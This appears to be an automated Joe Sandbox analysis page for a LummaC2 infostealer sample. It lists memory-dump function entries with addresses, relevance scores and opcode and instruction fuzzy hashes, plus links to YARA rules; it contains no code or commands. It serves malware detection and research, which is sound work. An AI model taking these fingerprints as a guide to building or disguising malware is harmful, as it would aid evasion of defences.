Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 2wl
API String ID: 0-4241762990
Opcode ID: 16dd48e927d739cf0f951a952cc9b5bdd1f2dbda71c964e0a681ecce06cd21b0
Instruction ID: fb86552375ded3627d1a41f3d634c05d326ed5758810737d5f923beb5686b6d2
Opcode Fuzzy Hash: 16dd48e927d739cf0f951a952cc9b5bdd1f2dbda71c964e0a681ecce06cd21b0
Instruction Fuzzy Hash: 07511A33B4A9958BD728897C8C217B66A938BE3338B2DC76DD4F1CB3E5D5654C029342

Function 006EE8D0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

@, xrefs: 006EE9AB

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 3da385d15636e3b1a772ed688eae912948ecb3449e2ebf72a6c759da92975990
Instruction ID: 3b70da9444d8d2d8eac2bcddee4f5fab4948db4551af946054e1c2262e8e4bf0
Opcode Fuzzy Hash: 3da385d15636e3b1a772ed688eae912948ecb3449e2ebf72a6c759da92975990
Instruction Fuzzy Hash: F4411FB16063408BD7148B15CC55BBBB7E3FFC5318F18891CE4854B3A5E776A904CB82

Function 006EDAA0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@, xrefs: 006EDAF0

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 9169b60fbbced8609e89c7e726f02041d310d9d76fe77caa9829019236f92a36
Instruction ID: 409a77c118e22b689b6d110315ba0a531cc34d8d7c9ab5a41f2922d3327fd4bb
Opcode Fuzzy Hash: 9169b60fbbced8609e89c7e726f02041d310d9d76fe77caa9829019236f92a36
Instruction Fuzzy Hash: 0621BDB15093849FD310DF19D8806ABB7F6FBC9328F15992CE58987250E735A905CB92

Function 006D8290 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

$, xrefs: 006D8360

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: fe20b709de2ce6c471d225917c09cd4814959a500f864564b51257db642741d4
Instruction ID: 37183f1028e8b17895e934b9a01eff3b95283c60ee5736d922e4d8ec31b85dfe
Opcode Fuzzy Hash: fe20b709de2ce6c471d225917c09cd4814959a500f864564b51257db642741d4
Instruction Fuzzy Hash: 852136366583505FE314CF659C85B5BB7B3DBC1700F0AC42DA5D99B2C6C978D80A8792

Function 006EBC14 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

, xrefs: 006EBC25, 006EBC55, 006EBC71

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 5db63d8f1da4bed449307ab0a97c305c6bc9d046a9b1a93001e7cdd13f57e727
Instruction ID: 3868432c157f7dbbfd566e7dae781f352f901d75251a384798494103770f0ad3
Opcode Fuzzy Hash: 5db63d8f1da4bed449307ab0a97c305c6bc9d046a9b1a93001e7cdd13f57e727
Instruction Fuzzy Hash: 5DF04420619A554FEBE08E7D94593BF6BE1E716214F303DB8C54DE32E1DD1498818B08

Function 006ED140 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aa1348cf2a9510bb72a540f89006d1527167d2d823271cdecca908976b63a76
Instruction ID: 0798f50f51f628d5bdfbf264d072b2f92e690e9bc464fd56f1008fbcd4a9344c
Opcode Fuzzy Hash: 9aa1348cf2a9510bb72a540f89006d1527167d2d823271cdecca908976b63a76
Instruction Fuzzy Hash: 3D22D032608211CFC718CF28D8906BAB7E3FF8A314F1A95ADD98987361D7319D56CB81

Function 006ED240 Relevance: .7, Instructions: 680COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26c778c7713f44e7bf35fa3320369510975ec82624690583fc334f6605db71de
Instruction ID: ce6dfc64c25117cf046cbb81460ced2af2ec63bacefcdaa5c2f6e5ee6d38b032
Opcode Fuzzy Hash: 26c778c7713f44e7bf35fa3320369510975ec82624690583fc334f6605db71de
Instruction Fuzzy Hash: 7712CF32719211CFC708CF28D8906BAB7E3EF8A314F1A95BDD98587362D6319D16CB81

Function 006B2F40 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b35642a3ad58238136e7646ff36865a78159f1e3ee3d74907b9d84a3b10718d
Instruction ID: 0be2b6e1c1c95a27669d86cab50edcec86784e5c7bd59b425e32fd68d90b0b7b
Opcode Fuzzy Hash: 3b35642a3ad58238136e7646ff36865a78159f1e3ee3d74907b9d84a3b10718d
Instruction Fuzzy Hash: 5652E4B16083558FCB15CF18C0906EABBE2FF88314F19896DF89A57351D774EA89CB81

Function 006B6660 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7b1376ecfac3224e576317ab5e7ba5109f3fb7bb2c40e16e260fd6d2eeb5da2
Instruction ID: fbf94c93a1519a79e8ad4d337ebc76ac8cf6bef94d0801bedd9c20fcf7cf81ab
Opcode Fuzzy Hash: d7b1376ecfac3224e576317ab5e7ba5109f3fb7bb2c40e16e260fd6d2eeb5da2
Instruction Fuzzy Hash: 815291F0908B848FEB35CB24C4943E7BBE2AB91314F14896DE5E6067C2C37DA9C58B55

Function 006B7440 Relevance: .7, Instructions: 664COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction ID: e9876e5abff8f457337e82a9ba430bc7b0b1732b3b5f1d7d85961ed6fec81872
Opcode Fuzzy Hash: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction Fuzzy Hash: B422D272A0C3158BC724DF18D8402EBB3E2EFD4305F29892DD98697381D734E995CB86

Function 006ED320 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 658109680101ccd1f50e9a79254a06082fbc5620b9476197379971809f61c36c
Instruction ID: d13b2de4fadada0bb9b811e77a3b8e9e7373241ae6e5b1d36d4620f96cb8ea32
Opcode Fuzzy Hash: 658109680101ccd1f50e9a79254a06082fbc5620b9476197379971809f61c36c
Instruction Fuzzy Hash: 6502C136718211CFC718CF28D89067AB7E3FF8A314F1A95ADD48597362D6319D16CB80

Function 006B3960 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02870765ed97ab4e0d3bb440c403a568d614fad9fb272249ba28bf03b9ec660
Instruction ID: 1f1ab6948b6c25fe0b3e6e42ecefec73921a24d3ac8e8e3b963f5c667268f45b
Opcode Fuzzy Hash: f02870765ed97ab4e0d3bb440c403a568d614fad9fb272249ba28bf03b9ec660
Instruction Fuzzy Hash: D73204B0A14B218FC378CF29C5905A6BBF2BF45710B604A2ED69787B91D736F985CB10

Function 006ED3B0 Relevance: .6, Instructions: 579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c283b7d8f89da19d8a5eec3f14876f9dff15bddbc4f7633fdda4f585e3a156
Instruction ID: 7aff027b4821e268dd4c14104173863d38a8557f92abf2fb22955781445a50d9
Opcode Fuzzy Hash: c8c283b7d8f89da19d8a5eec3f14876f9dff15bddbc4f7633fdda4f585e3a156
Instruction Fuzzy Hash: CEF1D332618211CFC718CF28D8906BAB7E3FFCA314F1A95ADD88597361D6319D16CB81

Function 006ED450 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90bd33ca5a8deb902a91e62ef9d1215a16b8a4ecf5b9ffe315e9a865a42baf71
Instruction ID: 5cc4b1da5140d883b926d04f884feff84074befd1bac129efd3286f20dd1c944
Opcode Fuzzy Hash: 90bd33ca5a8deb902a91e62ef9d1215a16b8a4ecf5b9ffe315e9a865a42baf71
Instruction Fuzzy Hash: 97F1E432618211CFC718CF29D8906BAB7E3EFCA314F1A99ADD88597351DA359D06CB81

Function 006E7790 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 985ef4a060c2f9b1473f934f41bfa76f3bd440e83f384122aecb4a3aabbfb12a
Instruction ID: 341891207dfb689b4f343856b4bb00ba4e5d06551692f0960f59b3ddfd5b8b58
Opcode Fuzzy Hash: 985ef4a060c2f9b1473f934f41bfa76f3bd440e83f384122aecb4a3aabbfb12a
Instruction Fuzzy Hash: 72E14432A093908FD714CF26D8916ABB7A3EBC5708F29892CE88597345DB35AD06C7D1

Function 006DD110 Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd076aee3a3c4928146ee6df1cd0f6ab2e9a23af6153d477403608df8612519
Instruction ID: ab7e6e5fcb3dec90f91a27bdd1de026cc301ad2b98f9a7624cae154cb0199b1d
Opcode Fuzzy Hash: 4cd076aee3a3c4928146ee6df1cd0f6ab2e9a23af6153d477403608df8612519
Instruction Fuzzy Hash: C722E3F0611B019FC3A9CF29C845AA7BFEAEB89314F50491EE2AEC7351C7716901CB95

Function 006D20C0 Relevance: .4, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c65c45d305c230929b2b89af7d6865c2b0e8c86e4a2c611a3ab50e7e426991f1
Instruction ID: 4059e3cbbb4562957fd7d66d6f6d5208970e928bf2549b33a9fd418d699da006
Opcode Fuzzy Hash: c65c45d305c230929b2b89af7d6865c2b0e8c86e4a2c611a3ab50e7e426991f1
Instruction Fuzzy Hash: 55A10771A083129BDB20DF24CCA26BBB3E2EFA1314F19992DE9C597341E734D945C356

Function 006B5970 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction ID: 0a0490ae18aa7563977ec4b35fb0a05b44bdb1504772db8b8e4526e1f2d3a5d7
Opcode Fuzzy Hash: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction Fuzzy Hash: E4E17B711087418FC721DF29C880BABBBE6EF99300F44892DF4D687751E675E988CB96

Function 006D6230 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65916f793e709c53c2af484d686c13f017f863771592ba92fb4bf8d9826cb6bc
Instruction ID: f2ef9d53af78eb85d43667918089f25adf15ed4d08deb4166c521a929c84a064
Opcode Fuzzy Hash: 65916f793e709c53c2af484d686c13f017f863771592ba92fb4bf8d9826cb6bc
Instruction Fuzzy Hash: 4FB159B1E483514BDB14CF24D8826BBB7E3EB95304F19892EF88287385D635DC0AC792

Function 006D1D10 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9de8e2fa8c795ec70cbadf3cd5ceb1409172312182bc72682fb141fd2e97e637
Instruction ID: 3ee76fbf2c00aaf8c403655220683574825db9f6a766522b5bcc208e7221f2e8
Opcode Fuzzy Hash: 9de8e2fa8c795ec70cbadf3cd5ceb1409172312182bc72682fb141fd2e97e637
Instruction Fuzzy Hash: 80A125B1A043019BD7249F24C892BA7B3E6EFD5364F18852DF9898F381E7B4D805C766

Function 006CD840 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 483769601d7b434a7569925f81e593bbcbc108a6412a296e57b29169f6dbda94
Instruction ID: 8155c947b024cbc908848aa38f39ad9688307598768cb76e9404064ba313b72a
Opcode Fuzzy Hash: 483769601d7b434a7569925f81e593bbcbc108a6412a296e57b29169f6dbda94
Instruction Fuzzy Hash: 25B1F075508301EBD7109F24DC41F7ABBE3EB98318F158A3DF8A8A32A0D6729D55DB42

Function 006EE1F0 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 102ad242f8af286f63188614bcec1250cdacd84af7858f9c1f27ef3bdd6fa6dd
Instruction ID: c730e69f7874de72c4b80b0dfa5013ed09d6da2ba171d7896424e81074b2e5eb
Opcode Fuzzy Hash: 102ad242f8af286f63188614bcec1250cdacd84af7858f9c1f27ef3bdd6fa6dd
Instruction Fuzzy Hash: 5091D2716053919FC725CF19D880A6AB3E3FF98714F15892CE98587395DB32BD01CB82

Function 006DDFC3 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d34f8aa76ed94290dd6ab02850c2a378e727cd9b80dc05ea697beb4dd84356e
Instruction ID: a270b9c62373c61e5a37a996a99b31fbec2fd9bd51cda6058eb998e8808ddd31
Opcode Fuzzy Hash: 2d34f8aa76ed94290dd6ab02850c2a378e727cd9b80dc05ea697beb4dd84356e
Instruction Fuzzy Hash: A7D1F172A08B814BD3198A38C8953A7BFD29BD6324F19CA7DD4EB877C6D578A405C702

